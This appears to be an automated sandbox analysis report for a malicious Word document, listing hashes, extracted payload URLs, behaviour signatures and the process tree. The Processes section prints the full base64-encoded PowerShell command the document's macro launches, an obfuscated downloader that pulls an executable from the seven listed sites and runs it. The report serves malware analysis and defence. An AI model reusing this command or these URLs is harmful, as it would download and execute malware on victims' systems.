Windows 7 deprecation
Windows 7 will be removed from tria.ge on 2025-03-31
Analysis
-
max time kernel
100s -
max time network
123s -
platform
windows10-2004_x64 -
resource
win10v2004-20240802-en -
resource tags
-
submitted
21/09/2024, 01:34
General
-
Target
eed25d6d5c363dc12cf924abd1f315c4_JaffaCakes118.doc
-
Size
195KB
-
MD5
eed25d6d5c363dc12cf924abd1f315c4
-
SHA1
ac3947373ab41e0ed8d52dd1d3e09c8660edf7b3
-
SHA256
d0b4b470d5e523a36a9751cec3eb8c5e1fae85904ab8637b745f1aebea3aa8cd
-
SHA512
27982f80f90b2be909823ede19f114c6dcd92dd85ccaf8ab740c1ca2907ba2d67bb6c6bcd18c01d231eefcae8c877070913643e3fc12c641a0b9c83594035eec
-
SSDEEP
1536:2rdi1Ir77zOH98Wj2gpngh+a9Z8ul8oPhEPmRl6VOE4j:2rfrzOH98ipgd8ul8uWP+l6VOE4j
Malware Config
Extracted
https://vstbar.com/wp-admin/Hs/
http://binarywebtechsolutions.com/mobile-website-designing-company-in-gurgaon/CLZ/
http://shahqutubuddin.org/U/
http://cybersign-001-site5.gtempurl.com/2xwzq/bve/
https://star-speed.vip/wp-admin/Ttv/
https://treneg.com.br/rfvmbh/a/
https://cimsjr.com/hospital/x2f/
Signatures
-
Process spawned unexpected child process 1 IoCs
This typically indicates the parent process was compromised via an exploit or macro.
-
Blocklisted process makes network request 1 IoCs
-
Checks processor information in registry 2 TTPs 3 IoCs
Processor information is often read in order to detect sandboxing environments.
-
Enumerates system info in registry 2 TTPs 3 IoCs
-
Suspicious behavior: AddClipboardFormatListener 2 IoCs
-
Suspicious behavior: EnumeratesProcesses 2 IoCs
-
Suspicious use of AdjustPrivilegeToken 1 IoCs
-
Suspicious use of SetWindowsHookEx 8 IoCs
Processes
-
C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE"C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\eed25d6d5c363dc12cf924abd1f315c4_JaffaCakes118.doc" /o ""1⤵
- Checks processor information in registry
- Enumerates system info in registry
- Suspicious behavior: AddClipboardFormatListener
- Suspicious use of SetWindowsHookEx
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -en JABVADMANABrAGoAeQBkAD0AKAAnAEEAcQAnACsAKAAnAHUAJwArACcAaABhAGEAJwApACsAJwBsACcAKQA7ACYAKAAnAG4AZQB3AC0AJwArACcAaQB0AGUAJwArACcAbQAnACkAIAAkAGUATgB2ADoAVQBzAEUAUgBwAFIAbwBmAGkATABlAFwAbQA3AGIAaQA0AE8AQwBcAFEAawByAEgAMgBaAEsAXAAgAC0AaQB0AGUAbQB0AHkAcABlACAAZABpAHIARQBjAFQATwBSAHkAOwBbAE4AZQB0AC4AUwBlAHIAdgBpAGMAZQBQAG8AaQBuAHQATQBhAG4AYQBnAGUAcgBdADoAOgAiAFMARQBgAEMAVQBSAEkAdABgAHkAUAByAGAATwBUAGAAbwBjAE8ATAAiACAAPQAgACgAKAAnAHQAbAAnACsAJwBzACcAKQArACgAJwAxADIALAAgACcAKwAnAHQAJwApACsAKAAnAGwAcwAxACcAKwAnADEALAAnACkAKwAoACcAIAAnACsAJwB0AGwAcwAnACkAKQA7ACQAQQA4AGcAdQBtAHkAOQAgAD0AIAAoACgAJwBGAGgAZABuACcAKwAnAHMAJwApACsAJwB1ACcAKQA7ACQAQgAwADkAbABkAHYAZAA9ACgAKAAnAEkAdwAnACsAJwB3ADMAJwApACsAJwB2ACcAKwAnADYAeQAnACkAOwAkAE0AYgBiADkAbwBjAGsAPQAkAGUAbgB2ADoAdQBzAGUAcgBwAHIAbwBmAGkAbABlACsAKAAoACcAVwBTACcAKwAoACcAeABNACcAKwAnADcAJwApACsAKAAnAGIAaQA0ACcAKwAnAG8AJwApACsAKAAnAGMAJwArACcAVwBTACcAKQArACgAJwB4ACcAKwAnAFEAawByAGgAMgAnACsAJwB6ACcAKQArACgAJwBrAFcAJwArACcAUwB4ACcAKQApACAALQByAEUAUABsAGEAYwBFACAAIAAoACcAVwBTACcAKwAnAHgAJwApACwAWwBDAGgAQQBSAF0AOQAyACkAKwAkAEEAOABnAHUAbQB5ADkAKwAoACcALgBlACcAKwAnAHgAZQAnACkAOwAkAFYAMwBnAGgAbQA2ADcAPQAoACcAUAAnACsAKAAnADAAJwArACcAbgAwACcAKQArACgAJwB0ACcAKwAnAHYAOAAnACkAKQA7ACQAQwB1AGQAagBsAGwAdwA9AC4AKAAnAG4AZQAnACsAJwB3AC0AbwBiAGoAZQBjACcAKwAnAHQAJwApACAATgBlAFQALgBXAEUAQgBjAEwASQBFAG4AVAA7ACQAWQBrADkAdgBkAGcAdQA9ACgAKAAnAGgAdAB0AHAAcwA6ACcAKwAnAC8AJwApACsAKAAnAC8AdgBzAHQAJwArACcAYgBhAHIAJwApACsAKAAnAC4AYwBvAG0AJwArACcALwAnACsAJwB3ACcAKQArACcAcAAnACsAJwAtACcAKwAoACcAYQBkACcAKwAnAG0AJwArACcAaQBuAC8AJwApACsAKAAnAEgAJwArACcAcwAvACcAKwAnACoAaAB0ACcAKQArACcAdAAnACsAJwBwADoAJwArACgAJwAvACcAKwAnAC8AYgBpACcAKQArACgAJwBuACcAKwAnAGEAcgB5AHcAZQBiAHQAJwArACcAZQAnACkAKwAoACcAYwBoAHMAbwAnACsAJwBsAHUAJwApACsAKAAnAHQAaQBvACcAKwAnAG4AcwAuAGMAJwArACcAbwAnACkAKwAnAG0ALwAnACsAKAAnAG0AbwBiAGkAbABlACcAKwAnAC0AdwBlACcAKwAnAGIAJwArACcAcwAnACkAKwAoACcAaQB0ACcAKwAnAGUAJwApACsAKAAnAC0AJwArACcAZABlAHMAaQBnACcAKQArACgAJwBuAGkAbgBnACcAKwAnAC0AYwAnACsAJwBvACcAKQArACcAbQBwACcAKwAoACcAYQBuACcAKwAnAHkAJwArACcALQBpAG4ALQAnACkAKwAoACcAZwB1ACcAKwAnAHIAZwAnACkAKwAoACcAYQBvACcAKwAnAG4ALwBDAEwAJwApACsAKAAnAFoAJwArACcALwAqAGgAdAAnACkAKwAnAHQAJwArACgAJwBwACcAKwAnADoALwAvAHMAaABhACcAKwAnAGgAcQAnACkAKwAnAHUAdAAnACsAJwB1AGIAJwArACcAdQAnACsAJwBkACcAKwAnAGQAaQAnACsAJwBuAC4AJwArACcAbwAnACsAJwByACcAKwAnAGcALwAnACsAJwBVACcAKwAnAC8AJwArACcAKgBoACcAKwAnAHQAJwArACgAJwB0AHAAJwArACcAOgAvACcAKQArACgAJwAvAGMAeQBiAGUAcgBzACcAKwAnAGkAZwAnACkAKwAoACcAbgAtACcAKwAnADAAMAAxAC0AcwBpACcAKwAnAHQAZQAnACsAJwA1AC4AZwB0ACcAKwAnAGUAJwApACsAJwBtACcAKwAnAHAAJwArACgAJwB1ACcAKwAnAHIAbAAnACkAKwAoACcALgBjAG8AJwArACcAbQAnACkAKwAnAC8AJwArACgAJwAyAHgAJwArACcAdwB6AHEAJwApACsAKAAnAC8AYgB2AGUAJwArACcALwAqACcAKQArACgAJwBoAHQAJwArACcAdABwACcAKQArACgAJwBzADoAJwArACcALwAnACkAKwAnAC8AcwAnACsAKAAnAHQAYQAnACsAJwByAC0AJwArACcAcwBwAGUAZQAnACkAKwAnAGQAJwArACcALgB2ACcAKwAnAGkAJwArACgAJwBwAC8AJwArACcAdwBwAC0AJwApACsAKAAnAGEAZABtAGkAJwArACcAbgAnACkAKwAnAC8AJwArACcAVAAnACsAKAAnAHQAJwArACcAdgAvACoAaAAnACsAJwB0AHQAcAAnACkAKwAnAHMAJwArACcAOgAvACcAKwAoACcALwAnACsAJwB0AHIAJwApACsAJwBlACcAKwAoACcAbgBlACcAKwAnAGcAJwApACsAJwAuAGMAJwArACgAJwBvAG0ALgBiACcAKwAnAHIALwAnACsAJwByAGYAJwApACsAKAAnAHYAbQAnACsAJwBiAGgAJwArACcALwBhAC8AKgBoAHQAJwApACsAJwB0AHAAJwArACcAcwAnACsAJwA6AC8AJwArACgAJwAvAGMAaQBtACcAKwAnAHMAJwApACsAKAAnAGoAcgAuACcAKwAnAGMAJwApACsAKAAnAG8AbQAvACcAKwAnAGgAJwApACsAJwBvAHMAJwArACcAcAAnACsAJwBpAHQAJwArACgAJwBhAGwALwB4ACcAKwAnADIAJwArACcAZgAvACcAKQApAC4AIgBTAFAAYABMAGkAdAAiACgAWwBjAGgAYQByAF0ANAAyACkAOwAkAEYAawAxAG0AbQBuAF8APQAoACcAWQAnACsAJwAxACcAKwAoACcAaAB2AHAAJwArACcAagAyACcAKQApADsAZgBvAHIAZQBhAGMAaAAoACQAVABmAHkAdgBqAHQAMwAgAGkAbgAgACQAWQBrADkAdgBkAGcAdQApAHsAdAByAHkAewAkAEMAdQBkAGoAbABsAHcALgAiAEQAYABPAFcAYABOAEwAYABvAGEAZABGAEkATABFACIAKAAkAFQAZgB5AHYAagB0ADMALAAgACQATQBiAGIAOQBvAGMAawApADsAJABPAGEAawB3AG0AbQBmAD0AKAAnAEIAJwArACgAJwA0ACcAKwAnAHoAZgAnACkAKwAoACcAaABlACcAKwAnAGgAJwApACkAOwBJAGYAIAAoACgAJgAoACcARwBlAHQALQBJACcAKwAnAHQAJwArACcAZQBtACcAKQAgACQATQBiAGIAOQBvAGMAawApAC4AIgBsAEUAbgBHAGAAVABIACIAIAAtAGcAZQAgADMANQAyADMAMwApACAAewAmACgAJwBJAG4AdgAnACsAJwBvAGsAZQAnACsAJwAtAEkAdABlAG0AJwApACgAJABNAGIAYgA5AG8AYwBrACkAOwAkAE4AdABrAGYAbQA3AHEAPQAoACcAVwAnACsAJwBrAHgAJwArACgAJwB4AGsAJwArACcAMQBuACcAKQApADsAYgByAGUAYQBrADsAJABEAHAAdABsAGwAMgA3AD0AKAAoACcATQBqACcAKwAnAHQAJwApACsAKAAnAHkAJwArACcANQBjADUAJwApACkAfQB9AGMAYQB0AGMAaAB7AH0AfQAkAEwAOAA3ADEAcQBkAGkAPQAoACcAVgAnACsAJwA0ACcAKwAoACcAcQBjAHQAJwArACcAdgAzACcAKQApAA==1⤵
- Process spawned unexpected child process
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
262KB
MD551d32ee5bc7ab811041f799652d26e04
SHA1412193006aa3ef19e0a57e16acf86b830993024a
SHA2566230814bf5b2d554397580613e20681752240ab87fd354ececf188c1eabe0e97
SHA5125fc5d889b0c8e5ef464b76f0c4c9e61bda59b2d1205ac9417cc74d6e9f989fb73d78b4eb3044a1a1e1f2c00ce1ca1bd6d4d07eeadc4108c7b124867711c31810
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
Filesize
1KB
MD54d1d27a02569f34a271c24efda6041e3
SHA1f846ad0f1716cb8fb690a7c0aa78dbdf2abd3d38
SHA2569715f26360811daab6617d9a1ea2774a5608d86f90bb4961ebe09d0228d97e21
SHA512723e81fcb0347ceac09b30db8835d48b153c2ad2a5a032f5917dc6adc4c7648534270b0c8293e90ac507e99e9d03501f5fd57733707821192c436cf26edf4fd7
-
Filesize
2.0MB
-
Filesize
4KB
-
Filesize
64KB
-
Filesize
64KB
-
Filesize
2.0MB
-
Filesize
2.0MB
-
Filesize
2.0MB
-
Filesize
2.0MB
-
Filesize
2.0MB
-
Filesize
2.0MB
-
Filesize
2.0MB
-
Filesize
64KB
-
Filesize
64KB
-
Filesize
64KB
-
Filesize
2.0MB
-
Filesize
2.0MB
-
Filesize
2.0MB
-
Filesize
2.0MB
-
Filesize
64KB
-
Filesize
2.0MB
-
Filesize
2.0MB
-
Filesize
2.0MB
-
Filesize
64KB
-
Filesize
2.0MB
-
Filesize
64KB
-
Filesize
64KB
-
Filesize
64KB
-
Filesize
64KB
-
Filesize
2.0MB
-
Filesize
2.0MB
-
Filesize
2.0MB
-
Filesize
136KB